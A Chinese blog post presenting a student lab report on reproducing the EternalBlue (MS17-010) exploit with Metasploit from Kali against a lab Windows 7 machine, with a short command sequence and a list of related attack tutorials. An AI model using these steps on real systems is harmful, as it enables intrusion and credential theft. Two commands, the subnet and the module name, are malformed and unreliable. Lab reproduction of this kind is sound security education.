实验一:永恒之蓝攻击复现实验报告

已于 2022-04-02 09:31:40 修改
阅读量4.8k 收藏 34
点赞数 4
分类专栏: 网络安全实验 文章标签: python 网络安全
于 2021-05-15 14:34:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44118750/article/details/116849203
版权 
姓名:软工女孩(b站同名)

一、实验项目名称
使用KALI进行MS17_010渗透提权

二、实验目的及要求

  1. 熟悉kali的基本安装与使用
  2. 理解软件msf的模块调用与使用
  3. 掌握MS17_010的模块的mimikatz软件使用
  4. 掌握windows的密码破解以及hash破解

三、实验环境
Windows、KALI

四、实验内容
5. 掌握永恒之蓝的使用以及msf模块的使用
6. 掌握基本提权与后门维持

五、实验步骤
1、搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按照步骤安装好后,配置好虚拟机设置以及网络连接。

2、分别打开两台虚拟机,在win7中打开cmd,查看ip地址
3、在Kali中打开终端,输入msfconsole
在这里插入图片描述

4、搜索永恒之蓝代号ms17_010
在这里插入图片描述

5、首先开始扫描局域网中存在的永恒之蓝的漏洞的电脑
在这里插入图片描述

6、填写需要扫描的网段并运行脚本
在这里插入图片描述

7、找到包含MS17-010(确定IP后面确定有ms17_010漏洞即可确定为漏洞)
8、调用攻击模块exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述

9、调用meterpreter工具攻击
在这里插入图片描述

六、实验程序与实验结果
实验程序:(详细见实验步骤截图代码命令)
msfconsole
search 17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.199.136.0/24
run
use exploit/windows/smb/ms_010_eternalblue
meterpreter
shell

实验结果:
在这里插入图片描述
在这里插入图片描述

七、实验总结
通过本次实验我们学习复原了永恒之蓝的攻击原理及过程,初步熟悉了kali工具的基本使用,但对于代码的理解和运用仍需继续学习加强。

苦瓜姐
关注
专栏目录
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
热门推荐
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
20202414 2022-2023-2 《网络与系统攻防技术》实验实验报告
h118189的博客
05-16 1152
本次实验学习目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。我进行了以下实践,对msf进行攻击有了更深的理解:1.1 一个主动攻击实践,使用使用漏洞为永恒之蓝(MS17_010);1.2 一个针对浏览器的攻击,使用漏洞为极光漏洞(MS10_002);1.3 一个针对客户端的攻击,实施了针对Adobe的漏洞的攻击;1.4 成功应用任何一个辅助模块。
基础渗透测试实验永恒之蓝漏洞复现
G6_12的博客
06-08 4145
ms17-010,永恒之蓝漏洞复现
永恒之蓝实验
最新发布
yy1715713348的博客
08-14 1045
APT(Advanced Persistent Threat):高级持续威胁,主要特点是利用手段高,攻击持续,高危害。APT攻击的一般规律: 1)高度目的性 2)高度隐蔽性 3)高度危害性 4)目标实体化 5)极强的持续性。一个APT是有一套隐匿和持续攻击的框架的,往往针对特定的实体由一人或多人策划(一般是多人)。
永恒之蓝(ms17-010)借助kali进行攻击win7实验报告
m0_65096687的博客
09-03 2856
永恒之蓝复现学习笔记
永恒之蓝实验 MS17-010
qq_43355651的博客
10-31 2881
永恒之蓝MS17-010是2016年8月公开的漏洞,基于445端口迅速传播扩散,危害超出想象的严重。 实验准备: 虚拟机下kali攻击机:192.168.111.128 w7靶机:192.168.111.129 在同一网段并且能ping通 首先利用nmap对靶机进行扫描 Nmap -sV 192.168.111.129 发现存在开放445端口 那我们可以利用永恒之蓝进行入侵 打开msfconsole 搜索ms17-010 这边我们可以进行选择可以利用的模块 use exploit
Linux(kali)永恒之蓝(ms17-010)漏洞实验
Selma003的博客
04-18 5933
永恒之蓝(ms17-010)漏洞实操。
永恒之蓝(MS17-010)漏洞攻击实验
qq_37340973的博客
11-12 2267
前言    “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,利用445端口入侵,获取shell进行提权。   工具:kali、windows7 一、开始攻击  ip:kali 192.168.1.100            windows7:192.168.1.101 首先我们ping一下目标靶机(windows7)   进入kali系统的msfconsole攻击框架 搜索MS17-010漏洞,先使用auxiliary/scanner/smb/smb_ms17_010这
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 588
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
MS17-010永恒之蓝漏洞原理及复现(学习中,未完善)
chenbx163的博客
08-02 226
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。设置被攻击IP地址后,并执行,然后找到蓝屏命令use0(其他电脑不一定,根据英文选择)并使用。一、什么是永恒之蓝
永恒之蓝(ms17-010)小实验
tmyzxy1314的博客
12-22 853
永恒之蓝漏洞复现
MS17-010(永恒之蓝)漏洞攻击实验
n534077的博客
03-12 2307
本次实验采用的设备如下: 攻击机:Linux-Kali x64 (IP:192.168.23.133) 靶机:Windows 7 x64 (IP:192.168.23.135) 备注:这里的靶机Windows 7系统推荐安装2015年及以前(事实上没有安装过MS17-010漏洞补丁的系统皆可)的64位系统,否则容易失败,两台设备(虚拟机)之间需要能够Ping通,这要求Windows 7系统关闭防火...
永恒之蓝漏洞复现
weixin_44901204的博客
09-06 787
永恒之蓝介绍 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,随后wannacry勒索病毒席卷全球,永恒之蓝也在安全界“臭名远扬”。 攻击方式 我们都知道永恒之蓝利用445端口进行攻击,445是用来实现文件共享的端口(SMB协议),假如445端口开放,用户只要开机上网,“永恒之蓝”就能在电脑里执行任意代码,植入勒索病毒等恶意程序。 漏洞复现 实验环境 渗
EternalBlue永恒之蓝渗透测试
AndyNoel的博客
03-05 559
Eternal Blue(永恒之蓝)-ms17-010渗透测试 第一次做的渗透测试,也是第一次去写博客,还望各位师傅多多指正 :) 工具 1.靶机系统 window7 开放445以及139端口 2.kali-Linux虚拟机 注意保证靶机与主机IP位于同一网段(可用ping命令进行检测) 0x01 更新metasploit 在kali终端输入msfconsole 然后输入apt-get install metaspolit-framework(要在root权限下,若不在,记得在命令前加入sudo,记得输入密
永恒之蓝漏洞(MS17_010)复现
qq_43081170的博客
08-15 336
实验环境 攻击机:kali x64(IP:192.168.192.129) 靶机:Windows 7(IP:192.168.195.143) 操作步骤 1、使用攻击机(kali)ping靶机(Windows7),确定两台主机互通; 2、启动msf:msfconsole; 3、使用search查找我们需要的模块,本次实验永恒之蓝漏洞,我们便搜索ms17_010,1是扫描模块,2是攻击模块; 4、使用扫描模块扫描靶机是否存在永恒之蓝漏洞。如果不知道设置什么参数,使用options命令查看; 设置扫描参数
永恒之蓝简单利用,实验环境搭建及实验过程
qq_43147309的博客
03-17 2586
搭建实验环境: VM:攻击机和靶机处于同一局域网内,采用NAT模式 靶机 Windows7(已关闭防火墙): 攻击机KALI: 攻击尝试: 1) 信息收集:端口445,139开着 2) 查询永恒之蓝MSF可用模块: 3) 使用模块,尝试攻击,获取到shell: 解决中文乱码问题: Chcp 65001 已获取目标主机权限,win7在CMD下开启3389端口: 此时win7的3...
MS17-010(永恒之蓝)漏洞复现
afei001
10-31 561
漏洞来源     永恒之蓝是2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布的一大批网络攻击工具中的其中一个。“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。 漏洞复现 实验一:获取windows server 2008的shell 实验环境:攻击机:kali        ...
实训-永恒之蓝入侵系统
及时清醒,事事如意
03-12 2173
setrhosts 192靶机IP)setthreads 20run。
永恒之蓝漏洞复现流程
09-01
永恒之蓝漏洞的复现流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值